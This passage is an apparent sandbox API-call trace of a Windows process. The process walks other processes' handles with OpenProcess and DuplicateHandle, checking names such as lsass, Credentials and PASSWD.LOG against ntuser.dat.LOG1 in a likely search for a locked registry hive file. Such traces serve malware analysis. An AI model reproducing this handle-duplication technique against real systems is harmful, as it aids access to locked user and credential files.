0x1e4 [0160.867] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0160.868] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0160.868] CloseHandle (hObject=0x1e4) returned 1 [0160.868] CloseHandle (hObject=0x194) returned 1 [0160.868] CloseHandle (hObject=0x1e8) returned 1 [0160.868] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1d8) returned 0x1e8 [0160.868] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x2dc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0160.868] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0160.869] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0160.870] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0160.870] CloseHandle (hObject=0x1e4) returned 1 [0160.870] _wcsicmp (_Str1="\\CatalogChangeListener-1d8-0", _Str2="\\ntuser.dat.LOG1") returned -11 [0160.870] CloseHandle (hObject=0x194) returned 1 [0160.870] CloseHandle (hObject=0x1e8) returned 1 [0160.870] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1d8) returned 0x1e8 [0160.870] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x2e8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0160.870] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0160.871] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0160.871] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0160.871] CloseHandle (hObject=0x1e4) returned 1 [0160.871] CloseHandle (hObject=0x194) returned 1 [0160.872] CloseHandle (hObject=0x1e8) returned 1 [0160.872] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1d8) returned 0x1e8 [0160.872] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x2ec, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0160.872] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0160.872] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0160.873] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0160.873] CloseHandle (hObject=0x1e4) returned 1 [0160.873] CloseHandle (hObject=0x194) returned 1 [0160.873] CloseHandle (hObject=0x1e8) returned 1 [0160.873] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x1e8 [0160.873] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0160.873] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0160.874] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0160.875] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0160.875] CloseHandle (hObject=0x1e4) returned 1 [0160.875] _wcsicmp (_Str1="\\System32", _Str2="\\ntuser.dat.LOG1") returned 5 [0160.875] CloseHandle (hObject=0x194) returned 1 [0160.875] CloseHandle (hObject=0x1e8) returned 1 [0160.875] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x1e8 [0160.875] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xa0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0160.875] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0160.876] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0160.877] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0160.877] CloseHandle (hObject=0x1e4) returned 1 [0160.877] CloseHandle (hObject=0x194) returned 1 [0160.877] CloseHandle (hObject=0x1e8) returned 1 [0160.877] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x1e8 [0160.877] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1a0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0160.877] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0160.878] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0160.878] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0160.878] CloseHandle (hObject=0x1e4) returned 1 [0160.878] CloseHandle (hObject=0x194) returned 1 [0160.879] CloseHandle (hObject=0x1e8) returned 1 [0160.879] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x1e8 [0160.879] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x2a0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0160.879] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0160.879] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0160.880] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0160.880] CloseHandle (hObject=0x1e4) returned 1 [0160.880] _wcsicmp (_Str1="\\PASSWD.LOG", _Str2="\\ntuser.dat.LOG1") returned 2 [0160.880] CloseHandle (hObject=0x194) returned 1 [0160.880] CloseHandle (hObject=0x1e8) returned 1 [0160.880] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x1e8 [0160.881] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x354, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0160.881] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0160.881] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0160.882] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0160.882] CloseHandle (hObject=0x1e4) returned 1 [0160.882] CloseHandle (hObject=0x194) returned 1 [0160.882] CloseHandle (hObject=0x1e8) returned 1 [0160.882] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x1e8 [0160.882] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x358, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0160.883] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0160.883] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0160.884] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0160.884] CloseHandle (hObject=0x1e4) returned 1 [0160.884] _wcsicmp (_Str1="\\lsass", _Str2="\\ntuser.dat.LOG1") returned -2 [0160.884] CloseHandle (hObject=0x194) returned 1 [0160.884] CloseHandle (hObject=0x1e8) returned 1 [0160.884] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x1e8 [0160.884] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x360, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0160.884] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0160.885] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0160.886] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0160.886] CloseHandle (hObject=0x1e4) returned 1 [0160.886] _wcsicmp (_Str1="\\lsass", _Str2="\\ntuser.dat.LOG1") returned -2 [0160.886] CloseHandle (hObject=0x194) returned 1 [0160.886] CloseHandle (hObject=0x1e8) returned 1 [0160.886] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x1e8 [0160.886] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x390, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0160.886] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0160.887] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0160.888] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0160.888] CloseHandle (hObject=0x1e4) returned 1 [0160.888] CloseHandle (hObject=0x194) returned 1 [0160.888] CloseHandle (hObject=0x1e8) returned 1 [0160.888] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x1e8 [0160.888] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x3c0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0160.888] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0160.889] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0160.890] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0160.890] CloseHandle (hObject=0x1e4) returned 1 [0160.890] _wcsicmp (_Str1="\\protected_storage", _Str2="\\ntuser.dat.LOG1") returned 2 [0160.890] CloseHandle (hObject=0x194) returned 1 [0160.890] CloseHandle (hObject=0x1e8) returned 1 [0160.890] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x1e8 [0160.890] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x3c4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0160.890] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0160.891] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0160.892] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0160.892] CloseHandle (hObject=0x1e4) returned 1 [0160.892] _wcsicmp (_Str1="\\protected_storage", _Str2="\\ntuser.dat.LOG1") returned 2 [0160.892] CloseHandle (hObject=0x194) returned 1 [0160.892] CloseHandle (hObject=0x1e8) returned 1 [0160.892] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x1e8 [0160.892] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x3c8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0160.892] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0160.893] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0160.894] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0160.894] CloseHandle (hObject=0x1e4) returned 1 [0160.894] _wcsicmp (_Str1="\\protected_storage", _Str2="\\ntuser.dat.LOG1") returned 2 [0160.894] CloseHandle (hObject=0x194) returned 1 [0160.894] CloseHandle (hObject=0x1e8) returned 1 [0160.894] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x1e8 [0160.894] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x550, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0160.894] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0160.895] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0160.896] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0160.896] CloseHandle (hObject=0x1e4) returned 1 [0160.896] _wcsicmp (_Str1="\\lsass", _Str2="\\ntuser.dat.LOG1") returned -2 [0160.896] CloseHandle (hObject=0x194) returned 1 [0160.896] CloseHandle (hObject=0x1e8) returned 1 [0160.896] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x1e8 [0160.896] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x5a0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0160.896] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0160.897] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0160.898] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0160.898] CloseHandle (hObject=0x1e4) returned 1 [0160.898] _wcsicmp (_Str1="\\lsass", _Str2="\\ntuser.dat.LOG1") returned -2 [0160.898] CloseHandle (hObject=0x194) returned 1 [0160.898] CloseHandle (hObject=0x1e8) returned 1 [0160.898] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x1e8 [0160.898] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x5a4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0160.898] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0160.903] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0160.904] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0160.904] CloseHandle (hObject=0x1e4) returned 1 [0160.904] CloseHandle (hObject=0x194) returned 1 [0160.904] CloseHandle (hObject=0x1e8) returned 1 [0160.904] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x1e8 [0160.904] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x5b4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0160.904] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0160.905] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0160.906] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0160.906] CloseHandle (hObject=0x1e4) returned 1 [0160.906] CloseHandle (hObject=0x194) returned 1 [0160.906] CloseHandle (hObject=0x1e8) returned 1 [0160.906] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x1e8 [0160.906] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x600, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0160.906] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0160.907] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0160.907] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0160.908] CloseHandle (hObject=0x1e4) returned 1 [0160.908] _wcsicmp (_Str1="\\Credentials", _Str2="\\ntuser.dat.LOG1") returned -11 [0160.908] CloseHandle (hObject=0x194) returned 1 [0160.908] CloseHandle (hObject=0x1e8) returned 1 [0160.908] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x1e8 [0160.908] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x608, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0160.908] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0160.909] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0160.909] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0160.910] CloseHandle (hObject=0x1e4) returned 1 [0160.910] _wcsicmp (_Str1="\\Credentials", _Str2="\\ntuser.dat.LOG1") returned -11 [0160.910] CloseHandle (hObject=0x194) returned 1 [0160.910] CloseHandle (hObject=0x1e8) returned 1 [0160.910] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x1e8 [0160.910] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x738, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0160.910] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0160.911] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0160.912] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0160.912] CloseHandle (hObject=0x1e4) returned 1 [0160.912] _wcsicmp (_Str1="\\CatalogChangeListener-1e0-0", _Str2="\\ntuser.dat.LOG1") returned -11 [0160.912] CloseHandle (hObject=0x194) returned 1 [0160.912] CloseHandle (hObject=0x1e8) returned 1 [0160.912] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x1e8 [0160.912] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x740, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0160.912] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0160.913] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0160.913] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0160.914] CloseHandle (hObject=0x1e4) returned 1 [0160.914] CloseHandle (hObject=0x194) returned 1 [0160.914] CloseHandle (hObject=0x1e8) returned 1 [0160.914] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x1e8 [0160.914] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x744, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0160.914] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0160.914] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0160.915] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0160.915] CloseHandle (hObject=0x1e4) returned 1 [0160.915] CloseHandle (hObject=0x194) returned 1 [0160.915] CloseHandle (hObject=0x1e8) returned 1 [0160.915] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x1e8 [0160.915] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x74c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0160.916] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0160.916] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0160.917] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0160.917] CloseHandle (hObject=0x1e4) returned 1 [0160.917] CloseHandle (hObject=0x194) returned 1 [0160.917] CloseHandle (hObject=0x1e8) returned 1 [0160.918] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x1e8 [0160.918] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x750, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0160.918] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0160.918] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0160.919] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0160.919] CloseHandle (hObject=0x1e4) returned 1 [0160.919] CloseHandle (hObject=0x194) returned 1 [0160.919] CloseHandle (hObject=0x1e8) returned 1 [0160.919] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x1e8 [0160.919] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x838, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0160.919] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0160.920] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0160.921] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0160.921] CloseHandle (hObject=0x1e4) returned 1 [0160.921] _wcsicmp (_Str1="\\lsass", _Str2="\\ntuser.dat.LOG1") returned -2 [0160.921] CloseHandle (hObject=0x194) returned 1 [0160.921] CloseHandle (hObject=0x1e8) returned 1 [0160.921] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e8) returned 0x1e8 [0160.921] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0160.921] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0160.922] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0160.923] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0160.923] CloseHandle (hObject=0x1e4) returned 1 [0160.923] _wcsicmp (_Str1="\\System32", _Str2="\\ntuser.dat.LOG1") returned 5 [0160.923] CloseHandle (hObject=0x194) returned 1 [0160.923] CloseHandle (hObject=0x1e8) returned 1 [0160.923] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e8) returned 0x1e8 [0160.923] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x88, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0160.923] CreateThread (in: 